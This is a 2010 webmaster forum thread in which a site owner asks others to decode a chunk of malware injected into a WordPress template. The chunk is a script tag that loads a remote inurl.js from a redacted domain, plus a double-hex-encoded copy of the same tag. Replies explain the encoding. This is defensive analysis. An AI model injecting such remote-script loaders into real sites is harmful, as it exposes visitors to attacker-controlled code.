Welcome to WebmasterWorld Guest from

Forum Moderators: phranque

Message Too Old, No Replies

decipher a chunk of malware

2:26 pm on Jul 6, 2010 (gmt 0)

Senior Member from CA 

WebmasterWorld Senior Member httpwebwitch is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 29, 2003
votes: 0

Here's a challenge for someone who likes puzzles

I just found this little chunk of crap injected into my WordPress template.

<script language="javascript" src="http://get.----[domain removed]----.com/inurl.js"></script>304430413343373336333732363937303734323036433631364536373735363136373635334432323641363137363631373336333732363937303734323232303733373236333344323236383734373437303341324632463637363537343245373336353734363836353646324536333646364432463639364537353732364332453641373332323345334332463733363337323639373037343345

do the numbers mean anything?
4:54 pm on July 6, 2010 (gmt 0)

Preferred Member

10+ Year Member

joined:July 25, 2006
posts: 460
votes: 0

An initial guess would be that each 2 digit pair is the hex code for an ASCII char. By that method, the first 8 digits decode to 0D0A, which is a carriage return + line feed.

Another guess is that the string is decoded or transformed by the inurl.js file fetched from the remote site.
5:12 pm on July 6, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Jan 29, 2002
votes: 0

It's double hex encoded, and appears to decode to the <script> statement you quote above:

<script language="javascript" src="http://get.----[mattur removed]----.com/inurl.js"></script>

Malfunctioning malware?! :)

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members